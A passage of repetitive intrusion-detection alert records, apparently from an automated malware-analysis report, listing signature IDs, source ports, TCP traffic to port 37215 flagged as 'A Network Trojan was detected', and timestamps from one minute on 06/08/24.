          SID:2835222
          Source Port:59702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731041
          SID:2835222
          Source Port:47744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172960
          SID:2829579
          Source Port:37478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.159282
          SID:2829579
          Source Port:59528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894557
          SID:2835222
          Source Port:38250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796368
          SID:2835222
          Source Port:57748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187988
          SID:2829579
          Source Port:47730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114288
          SID:2835222
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356220
          SID:2829579
          Source Port:43990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.187809
          SID:2829579
          Source Port:50328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704814
          SID:2835222
          Source Port:45896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810252
          SID:2829579
          Source Port:38262
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.858374
          SID:2829579
          Source Port:42386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238937
          SID:2829579
          Source Port:46718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.669606
          SID:2835222
          Source Port:45802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402063
          SID:2835222
          Source Port:33506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264303
          SID:2829579
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352404
          SID:2835222
          Source Port:41468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549374
          SID:2835222
          Source Port:49044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.744571
          SID:2829579
          Source Port:46324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.896513
          SID:2829579
          Source Port:50122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.735059
          SID:2835222
          Source Port:48230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.798804
          SID:2829579
          Source Port:59472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.295671
          SID:2835222
          Source Port:46522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551056
          SID:2829579
          Source Port:34414
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.134208
          SID:2829579
          Source Port:51732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.822988
          SID:2835222
          Source Port:50218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706782
          SID:2829579
          Source Port:58114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.111033
          SID:2835222
          Source Port:55488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.601410
          SID:2835222
          Source Port:57370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114353
          SID:2835222
          Source Port:54928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271245
          SID:2829579
          Source Port:35298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551968
          SID:2835222
          Source Port:37634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444739
          SID:2835222
          Source Port:55926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188842
          SID:2835222
          Source Port:49368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.361729
          SID:2835222
          Source Port:38058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.703924
          SID:2829579
          Source Port:49958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160335
          SID:2835222
          Source Port:48622
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.404657
          SID:2829579
          Source Port:33760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517251
          SID:2829579
          Source Port:41962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161078
          SID:2829579
          Source Port:57066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.132043
          SID:2835222
          Source Port:58732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242718
          SID:2835222
          Source Port:42156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.410612
          SID:2829579
          Source Port:55722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160809
          SID:2835222
          Source Port:52012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793050
          SID:2835222
          Source Port:60102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548014
          SID:2829579
          Source Port:40108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.466353
          SID:2829579
          Source Port:60416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741902
          SID:2829579
          Source Port:59074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.172947
          SID:2835222
          Source Port:50384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810778
          SID:2829579
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106964
          SID:2829579
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.792937
          SID:2829579
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.742928
          SID:2835222
          Source Port:33620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816519
          SID:2829579
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.071505
          SID:2829579
          Source Port:44272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.542263
          SID:2835222
          Source Port:39914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.901405
          SID:2829579
          Source Port:47492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600406
          SID:2829579
          Source Port:58944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.788470
          SID:2835222
          Source Port:56258
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.553162
          SID:2835222
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602045
          SID:2829579
          Source Port:54730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.355688
          SID:2835222
          Source Port:54404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158545
          SID:2829579
          Source Port:39658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177329
          SID:2835222
          Source Port:48960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.242505
          SID:2829579
          Source Port:60462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108769
          SID:2829579
          Source Port:57916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115445
          SID:2835222
          Source Port:53336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.402498
          SID:2829579
          Source Port:54146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890552
          SID:2829579
          Source Port:41678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.736935
          SID:2829579
          Source Port:57032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.793129
          SID:2829579
          Source Port:35194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.834405
          SID:2829579
          Source Port:48562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746150
          SID:2835222
          Source Port:55214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133741
          SID:2829579
          Source Port:59696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.513637
          SID:2835222
          Source Port:53740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160298
          SID:2835222
          Source Port:34672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747363
          SID:2835222
          Source Port:34314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.059865
          SID:2829579
          Source Port:47874
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792081
          SID:2829579
          Source Port:47080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236922
          SID:2829579
          Source Port:33086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.258436
          SID:2835222
          Source Port:51110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274421
          SID:2835222
          Source Port:33510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517828
          SID:2829579
          Source Port:59390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164370
          SID:2835222
          Source Port:35392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180944
          SID:2835222
          Source Port:58246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708953
          SID:2835222
          Source Port:48954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236731
          SID:2829579
          Source Port:48484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745709
          SID:2829579
          Source Port:33556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272883
          SID:2835222
          Source Port:54590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405867
          SID:2835222
          Source Port:39848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.176618
          SID:2829579
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.832524
          SID:2835222
          Source Port:41228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.464871
          SID:2835222
          Source Port:55714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.496155
          SID:2835222
          Source Port:56182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157320
          SID:2829579
          Source Port:52224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.175978
          SID:2835222
          Source Port:60946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912194
          SID:2829579
          Source Port:49668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600031
          SID:2829579
          Source Port:48556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152553
          SID:2829579
          Source Port:44806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.162706
          SID:2835222
          Source Port:37502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.179641
          SID:2835222
          Source Port:57664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.158839
          SID:2835222
          Source Port:48006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352496
          SID:2835222
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734402
          SID:2829579
          Source Port:36920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.792155
          SID:2829579
          Source Port:46378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461289
          SID:2835222
          Source Port:50114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734263
          SID:2835222
          Source Port:47800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.849677
          SID:2829579
          Source Port:55086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274416
          SID:2829579
          Source Port:40386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.894658
          SID:2829579
          Source Port:55498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730388
          SID:2829579
          Source Port:58208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461988
          SID:2829579
          Source Port:32848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115159
          SID:2829579
          Source Port:45648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.022074
          SID:2829579
          Source Port:57388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.812621
          SID:2835222
          Source Port:45350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.743506
          SID:2835222
          Source Port:54346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168403
          SID:2835222
          Source Port:50492
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.888737
          SID:2835222
          Source Port:54446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.890686
          SID:2829579
          Source Port:46290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.356393
          SID:2829579
          Source Port:48970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403647
          SID:2835222
          Source Port:37810
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462798
          SID:2835222
          Source Port:37888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.042071
          SID:2829579
          Source Port:41920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.555354
          SID:2835222
          Source Port:38514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513033
          SID:2835222
          Source Port:44812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731009
          SID:2829579
          Source Port:51580
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.747086
          SID:2829579
          Source Port:60900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.800551
          SID:2829579
          Source Port:43318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548687
          SID:2829579
          Source Port:37096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177185
          SID:2829579
          Source Port:57268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.549568
          SID:2829579
          Source Port:57234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261393
          SID:2835222
          Source Port:35018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.039548
          SID:2835222
          Source Port:60348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.084957
          SID:2835222
          Source Port:54976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.732172
          SID:2829579
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.168300
          SID:2829579
          Source Port:41396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:11.174313
          SID:2829579
          Source Port:49544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816788
          SID:2835222
          Source Port:59058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276560
          SID:2829579
          Source Port:39076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.063204
          SID:2835222
          Source Port:38594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.894849
          SID:2835222
          Source Port:46034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516729
          SID:2835222
          Source Port:43376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160238
          SID:2835222
          Source Port:46436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264751
          SID:2829579
          Source Port:37220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601055
          SID:2829579
          Source Port:36210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444524
          SID:2835222
          Source Port:55036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810910
          SID:2835222
          Source Port:36118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038244
          SID:2835222
          Source Port:50684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.548559
          SID:2829579
          Source Port:42664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178093
          SID:2829579
          Source Port:34652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704058
          SID:2835222
          Source Port:35446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264309
          SID:2829579
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551768
          SID:2829579
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.513306
          SID:2835222
          Source Port:51918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731770
          SID:2835222
          Source Port:33238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.177420
          SID:2829579
          Source Port:60740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791722
          SID:2835222
          Source Port:42656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855383
          SID:2829579
          Source Port:36280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.745405
          SID:2829579
          Source Port:40256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.152344
          SID:2829579
          Source Port:57776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.352513
          SID:2829579
          Source Port:39416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796614
          SID:2835222
          Source Port:43326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.274012
          SID:2829579
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462841
          SID:2835222
          Source Port:33678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461144
          SID:2829579
          Source Port:50820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.159125
          SID:2835222
          Source Port:40222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188398
          SID:2835222
          Source Port:60884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297358
          SID:2835222
          Source Port:38644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837630
          SID:2835222
          Source Port:51694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551722
          SID:2829579
          Source Port:42942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.444202
          SID:2829579
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782045
          SID:2829579
          Source Port:47914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.837493
          SID:2835222
          Source Port:34898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442076
          SID:2829579
          Source Port:57232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.378384
          SID:2829579
          Source Port:46334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515508
          SID:2835222
          Source Port:40696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161210
          SID:2835222
          Source Port:45748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599053
          SID:2835222
          Source Port:47072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.796402
          SID:2829579
          Source Port:40384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241044
          SID:2829579
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855111
          SID:2835222
          Source Port:46166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.180066
          SID:2835222
          Source Port:56274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902309
          SID:2835222
          Source Port:40654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113321
          SID:2829579
          Source Port:36914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895896
          SID:2835222
          Source Port:47174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405814
          SID:2829579
          Source Port:37954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.192507
          SID:2835222
          Source Port:38618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.784269
          SID:2829579
          Source Port:41848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264610
          SID:2829579
          Source Port:58554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854733
          SID:2829579
          Source Port:57746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.857075
          SID:2829579
          Source Port:45344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707375
          SID:2829579
          Source Port:55060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.276435
          SID:2835222
          Source Port:33530
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:04.733408
          SID:2835222
          Source Port:44618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.895849
          SID:2835222
          Source Port:46868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020239
          SID:2835222
          Source Port:60930
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130092
          SID:2829579
          Source Port:60540
          Destination Port:37215
